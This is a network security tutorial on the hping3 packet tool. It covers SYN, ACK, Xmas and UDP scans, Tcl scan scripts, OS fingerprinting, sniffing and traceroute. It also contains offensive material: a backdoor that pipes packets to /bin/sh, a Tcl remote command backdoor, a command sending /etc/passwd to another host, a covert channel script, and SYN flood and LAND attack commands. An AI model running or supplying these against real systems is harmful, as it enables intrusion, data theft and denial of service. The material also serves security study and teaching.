hping is a TCP/IP packet forging tool with embedded Tcl scripting functionality. Developed by antirez in 1998, it is now in its 3rd release. The tool runs on all major operatings systems including Linux, *BSD, and Windows.

Port Scanning

hping gives you complete freedom to craft any raw IP, TCP, UDP, and ICMP packets.

With such powerful capability we can proceed to replicate most of the standard scan types:

TCP SYN Scan

The simplest way to initiate a classic TCP SYN Scan is to use the following command line options:

hping3 -S 72.14.207.99 -p 80 -c 1

NOTE: I had to use -c 1 flag in order to send the SYN packet only once, otherwise hping will continue sending probes.

This will produce the following output:

HPING 72.14.207.99 (eth1 72.14.207.99): S set, 40 headers + 0 data bytes
len=46 ip=72.14.207.99 ttl=244 id=64932 sport=80 flags=SA seq=0 win=8190 rtt=266.4 ms

--- 72.14.207.99 hping statistic ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 266.4/266.4/266.4 ms

This will scan port 80 on Google. As we can see from the output returned packet from Google contains SYN and ACK flags set which indicates an open port.

In order to scan a range of ports starting from port 80 and up use the following command line:

hping3 -S 4.2.2.1 -p ++50

The ++ prefix will increment port number each subsequent packet sent to the target.

HPING 4.2.2.1 (eth1 4.2.2.1): S set, 40 headers + 0 data bytes
len=46 ip=4.2.2.1 ttl=56 DF id=32839 sport=50 flags=RA seq=0 win=0 rtt=264.3 ms
len=46 ip=4.2.2.1 ttl=56 DF id=32840 sport=51 flags=RA seq=1 win=0 rtt=277.6 ms
len=46 ip=4.2.2.1 ttl=56 DF id=32841 sport=52 flags=RA seq=2 win=0 rtt=285.4 ms
len=46 ip=4.2.2.1 ttl=56 DF id=32842 sport=53 flags=SA seq=3 win=49312 rtt=270.7 ms
len=46 ip=4.2.2.1 ttl=56 DF id=32843 sport=54 flags=RA seq=4 win=0 rtt=225.1 ms
len=46 ip=4.2.2.1 ttl=56 DF id=32844 sport=55 flags=RA seq=5 win=0 rtt=202.6 ms
len=46 ip=4.2.2.1 ttl=56 DF id=32845 sport=56 flags=RA seq=6 win=0 rtt=196.7 ms

--- 4.2.2.1 hping statistic ---
7 packets transmitted, 7 packets received, 0% packet loss
round-trip min/avg/max = 196.7/246.1/285.4 ms

From the output above we can see that the majority of probes returned RST packets indicating that all of these ports are closed. Only probe directed at port 53 returned SYN ACK thus suggesting an open port.

While this method is acceptable for a short range of ports, looking through thousands of responses is hard. The simplest solution to this problem is to use grep to only display interesting responses:

hping3 -S 4.2.2.1 -p ++50 | grep SA

However, you will quickly discover that using hping in such a way is cumbersome. With this in mind new scanning facilities were implemented which are called with -8 or --scan flags:

hping3 -8 50-56 -S 4.2.2.1

With the scan flag we have a much more flexible way to specify ports. For example, we can use comma separated values 50-56,80 special keywords known and all, and even negation 50,56,!known. As for the scan above, it produces the following output:

Scanning 4.2.2.1 (4.2.2.1), port 50-56
7 ports to scan, use -V to see all the replies
+----+-----------+---------+---+-----+-----+
|port| serv name |  flags  |ttl| id  | win |
+----+-----------+---------+---+-----+-----+
   53 domain     : .S..A...  56 31099 49312
All replies received. Done.
Not responding ports:

While the scanning mode of hping is very convenient, it does produce some packets useful for information collection but not for simple port discovery. Here is a packet trace for the above scan just for port 53:

# hping sends three SYN probes at once to target host
0.000000 192.168.1.100 -> 4.2.2.1      TCP 2268 > domain [SYN] Seq=0 Len=0
0.002677 192.168.1.100 -> 4.2.2.1      TCP 2268 > domain [SYN] Seq=2573678699 Len=0
0.004275 192.168.1.100 -> 4.2.2.1      TCP 2268 > domain [SYN] Seq=4285036453 Len=0
# target responds once saying that it is open
0.336498      4.2.2.1 -> 192.168.1.100 TCP domain > 2268 [SYN, ACK] Seq=3335179574 Ack=1 Win=49312 Len=0 MSS=1460
0.336528 192.168.1.100 -> 4.2.2.1      TCP 2268 > domain [RST] Seq=1 Len=0
# target responds again to the same probe
0.338791      4.2.2.1 -> 192.168.1.100 TCP [TCP Dup ACK 4#1] domain > 2268 [ACK] Seq=3335179575 Ack=1 Win=49312 Len=0
0.338809 192.168.1.100 -> 4.2.2.1      TCP 2268 > domain [RST] Seq=1 Len=0
# and again...
0.340180      4.2.2.1 -> 192.168.1.100 TCP [TCP Dup ACK 4#2] domain > 2268 [ACK] Seq=3335179575 Ack=1 Win=49312 Len=0
0.340190 192.168.1.100 -> 4.2.2.1      TCP 2268 > domain [RST] Seq=1 Len=0

While all of the above examples use hping's command line features, since the introduction of hping3 there is a powerful Tcl based scripting facility implemented in the tool. You can access the interactive mode of hping by simply typing hping3 with no other options. You should be presented with the following prompt:

hping3>

To initiate a simple SYN scan on Google's port 80 type in the following:

hping3> hping send "ip(saddr=192.168.1.100,daddr=72.14.207.99,ttl=255)+tcp(sport=666,dport=80,flags=s)"

In the above example we are specifying a complete TCP packet using Ars Packet Description (APD) format. We did not specify every single IP and TCP option, because hping is capable of filling them in automatically. However, here is an example of a completely specified APD packet:

ip(ihl=0x5,ver=0x4,tos=0x00,totlen=52,id=28880,fragoff=0,mf=0,df=1,rf=0,ttl=64,proto=6,cksum=0x5bbe,saddr=192.168.1.100,\
daddr=72.14.207.99)+tcp(sport=666,dport=80,seq=1804471615,ack=3634589598,x2=0x0,off=8,flags=a,win=62694,cksum=0xda46,urp=0)\
+tcp.nop()+tcp.nop()+tcp.timestamp(val=54111314,ecr=1049055856)

To scan multiple ports, a simple Tcl loop must be implemented:

hping3> for {set i 79} {$i<82} {incr i} {
hping send "ip(saddr=192.168.1.100,daddr=72.14.207.99,ttl=255)+tcp(sport=666,dport=$i,flags=s)"
}

The above command will scan ports 79-81 on Google. It makes sense to implement the above as a separate Tcl script for future use:

source "hpingstdlib.htcl"

if {$argc < 4} {
    puts {usage: hping3 exec tcpscan.htcl hostname start_port end_port [SYN|ACK]}
    exit 1
}

set target [lindex $argv 0]
set targetip [hping resolve $target]

set start_port [lindex $argv 1]
set end_port [lindex $argv 2]
set scan_type [lindex $argv 3]

if {[string toupper $scan_type] ====== "SYN"} {
    set send_flag "s"
    set return_flag "sa"
} elseif {[string toupper $scan_type] ====== "ACK"} {
    set send_flag "a"
    set return_flag "r"
}

set outifaddr [hping outifa $targetip]
set outifname [outifname $targetip]

hping setfilter $outifname "tcp and host $targetip"

set source_port [expr int(rand()*65536)]

proc send_probe {} {
    after 1000 send_probe
    global outifaddr targetip start_port end_port source_port send_flag return_flag
    if {$start_port > $end_port} exit
    append probe "ip(saddr=$outifaddr,daddr=$targetip,ttl=255)+"
    append probe "tcp(sport=$source_port,dport=$start_port,flags=$send_flag,win=4096)"
    hping send $probe
    incr start_port
}

proc recv_probe {} {
    global outifname outifaddr targetip start_port end_port source_port send_flag return_flag
    set packets [hping recv $outifname 0 1000]
    foreach p $packets {
               if {[GetIpSaddr $p] != $targetip} continue
               if {[GetIpDaddr $p] != $outifaddr} continue
           if {[GetApdField tcp flags $p] ====== $return_flag} {
               puts " Port [GetTcpSport $p] is open"
           }
    }
    after 10 recv_probe
}

puts "Scanning $target ($targetip), $start_port-$end_port"

hping recv $outifname 0
after 10 send_probe
after idle recv_probe
vwait forver

The above script illustrates the potential for custom scan development. It can be executed with the following command line:

hping3 exec tcpscan.htcl google.com 79 81 SYN

NOTE: Make sure hpingstdlib.htcl is somewhere in path (it comes with hping3 source files)

The above script produces the following output:

Scanning google.com (64.233.187.99), 79-81
 Port 80 is open

TCP ACK Scan

TCP ACK Scan can be performed by setting ACK flag in probe packets:

hping3 -A 72.14.207.99 -p 80 -c 1

Scripted execution can be performed just like in previous examples:

hping3> hping send "ip(saddr=192.168.1.100,daddr=72.14.207.99,ttl=255)+tcp(sport=666,dport=80,flags=a)"

And at last tcpscan.htcl in the previous section can be used to perform ACK Scan with the following command line:

hping3 exec tcpscan.htcl slashdot.org 79 81 ACK

NOTE: Google sends RST to all unknown ports, ACK Scan will fail. However, slashdot responds as it should according to RFCs ;-)

Other TCP Scans

Just like previously discussed scan types, we can construct other common and custom types using different flags available in hping3.

For TCP Scan the following parameters can be used:

Command Line Script Description
-S or --syn flags=s SYN
-A or --ack flags=a ACK
-R or --rst flags=r RST
-F or --fin flags=f FIN
-P or --push flags=p PUSH
-U or --urg flags=u URG
-X or --xmas flags=x Xmas
-Y or --ymas flags=y Tmas

With the above table in mind we can easily create XMas Scan:

hping3 -F -P -U 72.14.207.99 -p 80 -c 1

or inside the script:

hping3> hping send "ip(saddr=192.168.1.100,daddr=72.14.207.99,ttl=255)+tcp(sport=666,dport=80,flags=fpu)"

To perform a Null Scan, simply leave out all flags from sent probes:

hping3 72.14.207.99 -p 80 -c 1

UDP Scans

hping can be configured to operate in UDP mode by specifying -2 in the command line. Below is an example of a classic UDP Port Unreachable Scan:

hping3 -2 192.168.1.1 -p 80 -c 1

The above scan would generate output:

HPING 192.168.1.1 (eth1 192.168.1.1): udp mode set, 28 headers + 0 data bytes
ICMP Port Unreachable from ip=192.168.1.1 get hostname...
--- 192.168.1.1 hping statistic ---
1 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms

You can also use the following string in interactive mode:

hping3> hping send "ip(saddr=192.168.1.100,daddr=192.168.1.1,ttl=255)+udp(sport=666,dport=80)"

IP Scan

You can use hping to perform an IP Scan on the target in order to enumerate supported protocols. Use the following script to perform the scan:

source "hpingstdlib.htcl"

if {$argc < 1} {
    puts {usage: hping3 exec ipscan.htcl hostname}
    exit 1
}

set target [lindex $argv 0]
set targetip [hping resolve $target]

set outifaddr [hping outifa $targetip]
set outifname [outifname $targetip]

set ip_proto 1;

hping setfilter $outifname "icmp and host $targetip"

proc send_probe {} {
    after 100 send_probe
    global outifaddr targetip ip_proto
    if {$ip_proto > 255} exit
    append probe "ip(saddr=$outifaddr,daddr=$targetip,proto=$ip_proto,ttl=255)"
    hping send $probe
    incr ip_proto
}

proc recv_probe {} {
    global outifname outifaddr targetip
    set packets [hping recv $outifname 0 1000]
    foreach p $packets {
               if {[GetIpSaddr $p] != $targetip} continue
               if {[GetIpDaddr $p] != $outifaddr} continue
           puts "Response TYPE: [GetIcmpType $p]] CODE: [GetIcmpCode $p] ID: [GetIcmpId $p]"

    }
    after 10 recv_probe
}

puts "Scanning $target ($targetip)"

hping recv $outifname 0
after 10 send_probe
after idle recv_probe
vwait forver

Host Discovery

For all the different types of host discovery mechanisms, hping has only limited facilities to scan multiple targets from the command line (there is obviously no such limitation when scripting the task). In order to scan a range of IP addresses you may use //x// character to be replaced by hping with a random number. For example, the following command will scan entire class C LAN range:

hping3 -1 192.168.1.x --rand-dest -I eth0

ICMP Ping

You can perform an ICMP Ping with the following command:

hping3 -1 192.168.1.1

To send ICMP probe of different type such as Timestamp request:

hping3 -1 192.168.1.1 -C 13

There are abbreviations for two common ICMP tyles:

--icmp-ts
equivalent to -C 13 (Timestamp request)
--icmp-addr
equivalent to -C 17 (Address mask request)

Interactive mode can be used to produce similar results:

hping3> hping send "ip(daddr=192.168.1.1)+icmp(type=8)"

hping3 comes a complete implementation of ICMP Ping (Echo based) in //lib// directory:

hping3 exec ping.htcl 192.168.1.1

TCP Ping

Various types of TCP Pings can be sent by using standard TCP flags. For example, to send a TCP SYN Ping to port 80:

hping3 -S 192.168.1.1 -p 80

and here is an example of Xmas Ping:

hping3 -F -P -U 192.168.1.1 -p 0

UDP Ping

UDP Ping can be built using the following command:

hping3 -2 192.168.1.1 -p 0

the following script command will produce similar results:

hping3> hping send "ip(saddr=192.168.1.100,daddr=192.168.1.1,ttl=255)+udp(sport=666,dport=0)"

OS Fingerprinting

Initial Sequence Number

hping proves several ways to collect ISNs and determine their increments. The simplest one is to use -Q or --seqnum:

hping3 192.168.1.103 -Q -p 139 -S
HPING 192.168.1.103 (eth1 192.168.1.103): S set, 40 headers + 0 data bytes
1122514315 +1122514315
1122772104 +257789
1123051866 +279762
1123339049 +287183
1123650435 +311386
1123929718 +279283
1124215445 +285727

--- 192.168.1.103 hping statistic ---
7 packets transmitted, 7 packets received, 0% packet loss
round-trip min/avg/max = 0.2/2.1/10.9 ms

There is also a powerful script to generate a spectrogram of ISN increments:

hping3 exec isn-spectrogram.htcl 192.168.1.103 100 135

This will produce the following graph for a Windows XP box:

{{:tools:isn-spectrogram.png|}}

Sniffer

Using hping's listening modes we can intercept and save all traffic going through our machine's network interface. For example, to intercept all traffic containing HTTP signature the following command can be used:

hping3 -9 HTTP -I eth0

Note: Each packet will have initial HTTP cut off due to the way hping's signature works

Or even better, intercept all google search queries:

hping3 -9 "http://www.google.com/search?" --beep -I eth0

Tcl must be used for more advanced display of captured information. To display all traffic capture on the wire:

hping3> while 1 {
set p [lindex [hping recv eth1] 0]
puts "[hping getfield data str $p]"
}

We can even show tcpdump like output:

hping3> while 1 {
    set p [lindex [hping recv eth1] 0]
    puts "[hping getfield ip saddr $p] -> [hping getfield ip daddr $p]"
}

Backdoor

Further expanding on hping's listening feature, we can pipe receiving packets to /bin/sh in order to create a simple backdoor:

hping3 -I eth1 -9 secret | /bin/sh

Backdoor can now be used by crafting packets destined at the host which contain signature (secret) followed by executable command stored in //commands_file// (cal; must add semi-column for /bin/sh to execute):

hping3 -R 192.168.1.100 -e secret -E commands_file -d 100 -c 1

While command line offers only rudimentary backdoor functionality, we can improve by writing our own backdoor script:

if {$argc < 1} {
    puts {usage: hping3 exec backdoor.htcl secret}
    exit 1
}

set secret [lindex $argv 0]
while 1 {
    set p [lindex [hping recv eth1] 0]
    set data [hping getfield data str $p]
    if {[string match $secret* $data]} {
    set cmd [string map "$secret {}" $data]
    set output ""

    set io [ open |$cmd ]
    while { [gets $io line] >= 0 } { append output "$line\n"}
    close $io

    set packet "ip(saddr=[hping getfield ip daddr $p],daddr=[hping getfield ip saddr $p],ttl=255)+"
    append packet "tcp(sport=[hping getfield tcp sport $p],dport=[hping getfield tcp dport $p],flags=r)+"
    append packet "data(str=$output)"

    hping send $packet
    }
}

You can execute the above with the following parameters:

hping3 exec backdoor.htcl secret

Now with the backdoor running on 192.168.1.100, we can execute on remote machine:

hping3 -R 192.168.1.100 -e secretcal -c 1

Here is a packet trace for the above request:

No.     Time        Source                Destination           Protocol Info
      3 0.000155    192.168.1.109         192.168.1.100         TCP      2561 > 0 [RST] Seq=0 Len=9

0000  00 00 00 11 11 11 00 00 00 22 22 22 08 00 45 00   ..............E.
0010  00 31 14 fd 00 00 40 06 e1 a8 c0 a8 01 6d c0 a8   .1....@......m..
0020  01 64 0a 01 00 00 33 c1 ce 1f 69 52 75 e3 50 04   .d....3...iRu.P.
0030  02 00 32 f0 00 00 73 65 63 72 65 74 63 61 6c      ..2...secretcal

Backdoor script will match "secret" keyword and execute cal command after it. Output will be sent back as a reset packet. Here is a packet trace the response:

No.     Time        Source                Destination           Protocol Info
      4 0.006076    192.168.1.100         192.168.1.109         TCP      2561 > 0 [RST] Seq=0 Len=168

0000  00 00 00 22 22 22 00 00 00 11 11 11 08 00 45 00   ..............E.
0010  00 d0 ea d5 00 00 ff 06 4c 30 c0 a8 01 64 c0 a8   ........L0...d..
0020  01 6d 0a 01 00 00 00 00 00 00 00 00 00 00 50 04   .m............P.
0030  00 00 ff af 00 00 20 20 20 53 65 70 74 65 6d 62   ......   Septemb
0040  65 72 20 32 30 30 37 20 20 20 0a 53 75 20 4d 6f   er 2007   .Su Mo
0050  20 54 75 20 57 65 20 54 68 20 46 72 20 53 61 0a    Tu We Th Fr Sa.
0060  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                   
0070  20 20 20 31 0a 20 32 20 20 33 20 20 34 20 20 35      1. 2  3  4  5
0080  20 20 36 20 20 37 20 20 38 0a 20 39 20 31 30 20     6  7  8. 9 10 
0090  31 31 20 31 32 20 31 33 20 31 34 20 31 35 0a 31   11 12 13 14 15.1
00a0  36 20 31 37 20 31 38 20 31 39 20 32 30 20 32 31   6 17 18 19 20 21
00b0  20 32 32 0a 32 33 20 32 34 20 32 35 20 32 36 20    22.23 24 25 26 
00c0  32 37 20 32 38 20 32 39 0a 33 30 20 20 20 20 20   27 28 29.30     
00d0  20 20 20 20 20 20 20 20 20 20 20 20 20 0a                      .

We can clearly see cal output embedded inside TCP RST packet. Further modifications/additions can be made to only accept command requests from a set of ips with certain flags, parameters, etc.

File Transfer

Instead of transferring separate commands we can transfer complete files using hping. Here is how to set up the receiving end:

hping3 -1 192.168.1.100 -9 signature -I eth0

And here is the sending part:

hping3 -1 192.168.1.101 -e signature -E /etc/passwd -d 2000

Note: Set proper file size with -d flag, hping will automatically fragment. I was not able to transmit files with --safe flag.

Covert Channel

With the power of crafting virtually any IP packet, we can establish a covert communication channel only using IP Protocol ids which are 8bit values just like ASCII. This script will be split into receiving and sending parts.

source "hpingstdlib.htcl"

if {$argc < 2} {
    puts {usage: hping3 exec covert-send.htcl hostname message}
    exit 1
}

set target [lindex $argv 0]
set targetip [hping resolve $target]

set outifaddr [hping outifa $targetip]
set outifname [outifname $targetip]

set message [lindex $argv 1]

foreach c [split $message {}] {
    set v 0;
    scan $c %c v;
    hping send "ip(saddr=$outifaddr,daddr=$targetip,proto=$v,ttl=255)+data(str=redflag)"
}

Using the above script the actual message is converted to numerical ASCII equivalent so you can not immediately see the message. However, you will see a lot of ICMP Protocol Unreachable message coming from a freaked out machine + the "redflag" message transmitted in cleartext. Here the receiving portion of covert channel:

while 1 {
    set p [lindex [hping recv eth1] 0]
    set data [hping getfield data str $p]
    if {[string match redflag* $data]} {
    puts [ format %c [hping getfield ip proto $p] ]
    }
}

Below is a sample packet trace for the message "hping"

0.000000 192.168.1.100 -> 192.168.1.1  IP ARIS (0x68)         # h
0.000376 192.168.1.100 -> 192.168.1.1  VRRP Announcement (v7) # p
0.000510 192.168.1.100 -> 192.168.1.1  IP SCPS (0x69)         # i
0.000640 192.168.1.100 -> 192.168.1.1  IP Compaq Peer (0x6e)  # n
0.000770 192.168.1.100 -> 192.168.1.1  PIMv7 Unknown          # g

Flooding

Here is an example of a classic [[attacks:syn_flood]] targeting 192.168.1.1:

hping3 -S 192.168.1.1 -a 192.168.1.254 -p 22 --flood

Using the above example it is trivial to construct a [[attacks::land_attack]]:

hping3 -S 192.168.1.101 -a 192.168.1.101 -k -s 135 -p 135 --flood

A variation on the above is Remote LAND Attack, where a target router's external and internal IPs are used:

hping3 -A -S -P -U 66.66.66.66 -k -s 80 -p 80 -a 192.168.1.1

Fuzzing

Traceroute

Basic UDP traceroute can be emulated using the following command:

hping3 -2 4.2.2.1 -p ++44444 -T -n

HPING 4.2.2.1 (eth1 4.2.2.1): udp mode set, 28 headers + 0 data bytes
hop=1 TTL 0 during transit from ip=192.168.1.1
hop=1 hoprtt=0.5 ms
3: hop=3 TTL 0 during transit from ip=68.88.88.88
hop=3 hoprtt=12.2 ms
hop=4 TTL 0 during transit from ip=68.89.89.89
hop=4 hoprtt=10.7 ms
hop=5 TTL 0 during transit from ip=4.79.43.134
hop=5 hoprtt=10.7 ms
hop=6 TTL 0 during transit from ip=4.79.43.133
hop=6 hoprtt=9.0 ms
hop=7 TTL 0 during transit from ip=4.68.18.126
hop=7 hoprtt=29.9 ms
hop=8 TTL 0 during transit from ip=4.68.123.38
hop=8 hoprtt=12.3 ms
ICMP Port Unreachable from ip=4.2.2.1
ICMP Port Unreachable from ip=4.2.2.1
...

Similarly TCP traceroute can be launced with the following:

hping3 -S 4.2.2.1 -p 53 -T

Note: if hping gets stuck on any given hop simple press CTRL-Z in order to skip unresponsive hop.

In order to observe how the route changes at different hops, we can fix the TTL value. For example, when pinging Google we can see how routes change on hop 15:

hping3 -S 64.233.167.99 -p 80 -T --ttl 15 --tr-keep-ttl -n

HPING 64.233.167.99 (eth1 64.233.167.99): S set, 40 headers + 0 data bytes
hop=15 TTL 0 during transit from ip=66.249.94.133
hop=15 hoprtt=64.7 ms
hop=15 TTL 0 during transit from ip=66.249.94.133
hop=15 hoprtt=90.5 ms
hop=15 TTL 0 during transit from ip=72.14.232.53
hop=15 hoprtt=63.9 ms
hop=15 TTL 0 during transit from ip=72.14.232.53
hop=15 hoprtt=61.6 ms

Firewall/IDS Testing

TCP Timestamp Filtering

Many firewalls include a rule to drop TCP packets that do not have TCP Timestamp option set which is a common occurrence in popular port scanners. Simply add --tcp-timestamp option to append timestamp information:

hping3 -S 72.14.207.99 -p 80 --tcp-timestamp

Local Privilege Escalation

Notice that any shell commands can be executed from hping3> command prompt. If hping3> is running with root privileges then all shell commands will be executed as root.

hping3> id
uid=0(root) gid=0(root) groups=0(root)

External Links

Published on August 13th, 2008 by iphelix

sprawlsimilar

nmap

nmap (Network MAPper) is a network port scanner with service version and operating system detection engines. The tool was originally developed by Fyodor and published in Phrack Issue 51 in 1997. The tool is command line although a number of GUIs exist. nmap runs on a variety of platforms including Linux, *BSD, Windows, and others. Read more.

scapy

Scapy is a packet forging tool using Python as its domain specific language. It was developed by Philippe Biondi in 2003. Read more.

denial of service

A Denial of Service (DoS) attack is designed to prevent legitimate access to a target system. This article will cover techniques used to DoS a machine or service. Read more.

port scanning

Discovering open ports on a networked system is an important reconnaissance step used to enumerate potentially vulnerable services. In this article you will learn a number of techniques used to perform fast and reliable port scans while bypassing many trivial defenses. Read more.


sprawlcomments

All original content on this site is copyright protected and licensed under Creative Commons - Attribution, NonCommercial, ShareAlike 4.0 International.

π
///\oo/\\\